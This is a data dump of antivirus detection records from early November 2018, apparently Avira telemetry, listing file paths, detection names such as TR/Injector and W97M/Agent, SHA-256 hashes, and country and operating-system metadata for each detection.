  Row(detection=Row(filename='avscan-20181102-055401-ab2d724e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055401-AB2D724E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053148-90b6f80d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053148-90B6F80D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6a2db419db9e49e45998e30cfc3c61e0be4e917c85b67c4c68f4445bd16794e6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6A2DB419DB9E49E45998E30CFC3C61E0BE4E917C85B67C4C68F4445BD16794E6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6a2db419db9e49e45998e30cfc3c61e0be4e917c85b67c4c68f4445bd16794e6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:57:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-164606-fffddb22', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8e64cb28\\AVSCAN-20181102-162959-7940ACA9\\AVSCAN-20181102-164606-FFFDDB22', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:46:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054645-a7620ec9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054645-A7620EC9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-225649-04948307', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_65242a8d\\AVSCAN-20181101-222335-56E468E9\\AVSCAN-20181101-225649-04948307', filesize=1152000, name='Adware/DealPly.ypbfr.#M1.#R1'), hash='69b28945e664e80086fac1f103180f3261fb052f5d9dd42410cade338ba0bf3c', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:56:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052137-248e33db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052137-248E33DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061828-15aa4e7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061828-15AA4E7A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053008-54fab993', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053008-54FAB993', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054958-1a0b6b3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054958-1A0B6B3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060557-5607f0a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060557-5607F0A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061945-43677dd7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061945-43677DD7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060304-eea36c3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060304-EEA36C3A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053832-8195cd51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053832-8195CD51', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055153-5e9b97ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055153-5E9B97AD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051337-0641fde0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051337-0641FDE0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054043-cf3a14c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054043-CF3A14C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053029-616726a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053029-616726A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052624-cf4c54e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052624-CF4C54E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053631-39076be7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053631-39076BE7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060805-a2247a2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060805-A2247A2D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060205-cb4356ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060205-CB4356ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061649-daaebce3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061649-DAAEBCE3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060448-2ca29b88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060448-2CA29B88', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055058-3e0fb16f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055058-3E0FB16F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053044-6a6b0438', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053044-6A6B0438', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062533-129e9f8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062533-129E9F8A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053832-817dbe14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053832-817DBE14', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051612-62a71540', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051612-62A71540', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Users\\X\\AppData\\Local\\Smartbar\\application\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='85b2a4f1594c8b1c4b5899805517daf76fdf97ae31efe7caf45408440e785652', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:51:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051425-22fe508a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051425-22FE508A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062407-df544516', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062407-DF544516', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T12:30:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050851-5bb10437', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050851-5BB10437', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053352-daae341e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053352-DAAE341E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052556-be68aaba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052556-BE68AABA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053729-5b9f9100', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053729-5B9F9100', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051210-d24b37a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051210-D24B37A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051251-eab9091e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051251-EAB9091E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055840-519f4647', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055840-519F4647', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055726-255c1346', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055726-255C1346', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060135-b9c2740d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060135-B9C2740D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055911-63dcf0b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055911-63DCF0B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060111-ab2a479b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060111-AB2A479B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050555-f2b371b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050555-F2B371B2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054156-facd582b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054156-FACD582B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153242-097a857d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23aae419\\AVSCAN-20181102-153102-014D8803\\AVSCAN-20181102-153242-097A857D', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='81e2165a9cda92e60e428fd8e7698452208edc18149b25474c8358fa8572a5ba', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T14:32:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054854-f3ff08cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054854-F3FF08CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051434-2855b795', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051434-2855B795', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:01:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051949-e3b842f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051949-E3B842F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052549-babeb855', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052549-BABEB855', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062631-351294bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062631-351294BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='39227ec741c01dff7028b6bb6747e6b5ce71f470b46ae34504d42db16f31fa70', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\39227EC741C01DFF7028B6BB6747E6B5CE71F470B46AE34504D42DB16F31FA70', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='39227ec741c01dff7028b6bb6747e6b5ce71f470b46ae34504d42db16f31fa70', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='53bab36cf78ed5d01820e0c053933882bf0353fd4e874d787db6db3790e1053b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:52:13Z'), dt=datetime.date(2018, 11, 1)),
